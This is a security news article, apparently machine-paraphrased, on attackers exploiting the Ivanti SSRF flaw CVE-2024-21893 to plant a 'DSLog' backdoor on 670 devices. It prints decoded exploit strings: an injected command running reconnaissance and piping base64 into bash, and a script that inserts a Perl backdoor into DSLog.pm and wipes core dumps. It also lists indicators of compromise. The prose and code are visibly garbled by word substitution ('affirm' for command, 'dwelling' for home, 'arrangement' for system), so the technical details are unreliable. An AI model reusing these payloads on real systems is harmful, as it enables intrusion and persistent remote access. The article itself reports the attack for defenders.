Hackers Inject DSLog Malware to 670 Devices Using Ivanti SSRF Flaw Exploit

by Esmeralda McKenzie
Hackers Inject DSLog Malware to 670 Devices Using Ivanti SSRF Flaw Exploit

Hackers Inject DSLog Malware to 670 Devices Using Ivanti SSRF Flaw Exploit

Hackers Exploiting Ivanti SSRF flaw to Inject DSLog Malware

Ivanti Connect Ranking was as soon as previously chanced on with yet every other SSRF vulnerability that could perhaps presumably moreover allow unauthenticated menace actors to entry unrestricted resources because of the a flaw within the SAML module. The vulnerability was as soon as assigned with CVE-2024-21893, and the severity was as soon as 8.2 (High).

Moreover, this vulnerability was as soon as previously reported to be exploited by menace actors within the wild genuine thru disclosure. Nonetheless, newest reports place that menace actors enjoy leveraged this vulnerability to put in a previously unknown and appealing “DSLog backdoor” on vulnerable devices.

Orange Cyberdefense detected 670 compromised resources that attackers injected backdoor the use of a SAML vulnerability. This equipped the attacker with power distant entry.

Myth

Dwell Fable Takeover Assault Simulation

How discontinue Hackers Bypass 2FA?

Dwell attack simulation Webinar demonstrates varied methods wherein story takeover can occur and practices to present protection to your web sites and APIs in opposition to ATO attacks .

Hackers Exploiting Ivanti SSRF Flaw

In accordance to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that menace actors exploit by injecting a backdoor with affirm injection. This backdoor was as soon as accessed and controlled with a standard “API Key” mechanism.

Preliminary search files from

Throughout the initial portion of the attack, menace actors ship an unauthenticated SAML authentication search files from that contains an encoded affirm with “RetrievalMethod URI.” The search files from was as soon as identified to be a URL-encoded search files from containing a base64 encoded affirm alongside the URI.

Decoding the search files from for URL and base64 offers the next line of affirm outdated by menace actors for exploitation.

http://127.0.0.1:8090/api/v1/license/keys-living/;echo echo $(uname –
a;identification)>/dwelling/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

This affirm gathers inner reconnaissance files and stores it into a file named “index2.txt” the use of the ‘echo’ affirm line tool. The encoded strings are moreover decoded the use of the base64 decode utility and bash affirm interpreter.

Backdoor Installation

Once the above affirm is carried out efficiently, the menace actors then try and install the backdoor on the vulnerable tool the use of the same strategy of URL and Base64 encoding of instructions. The search files from is as follows:

http://127.0.0.1:8090/api/v1/license/keys-living/;echo mount -o remount,rw /
DESTFILE=”/dwelling/perl/DSLog.pm”
CLFILE=”/dwelling/perl/DSLogMB.pm”
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then
echo ‘OK’;
else
sed -i ‘102i\ my $ua = $ENV{HTTP_USER_AGENT};n my $req =
$ENV{QUERY_STRING};n my $qur =
”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7”;n my @param =
split(/&/, $req);n if (index($ua, $qur) != -1) {n if ($param[1]){n my @res = split(/=/,
$param[1]);n if ($res[0] eq ”cdi”){n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;n
$res[1] =~ tr/!-~/P-~!-O/;n arrangement(${res[1]});n }n }n }’ $DESTFILE
fi
/bin/contact -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/dwelling/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
/bin/bash;
Decoded backdoor affirm (Source: Orange Cyber Protection)

This backdoor affirm is carried out on the compromised tool, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module to blame for logging authenticated web requests and web requests and arrangement logs on the tool.

Orange Cyber Protection offers a complete breakdown of the backdoor, affirm execution, methodologies, and assorted technical facts for these with a tough technical background.

Indicators of Compromise

Host-based IoC

Route + filename Hash Description
/root/dwelling/perl/DSLog[.]pm N/A – varies Legitimate DSLog Log module embedding the
/root/dwelling/webserver/htdocs/danana/imgs/index[.]txt N/A – varies backdoor
/root/dwelling/webserver/htdocs/danana/imgs/index1[.]txt N/A – varies Some appear to be random characters.
/root/dwelling/webserver/htdocs/danana/imgs/index2[.]txt N/A – varies Some appear to be random characters.
/root/dwelling/webserver/htdocs/danana/imgs/mark[.]png Embedding the consequence of ‘uname -a’

Community-based IoC

Community Indicator Kind Description
159.65.123.122 IP Address Huge exploitation job

Source credit : cybersecuritynews.com

Related Posts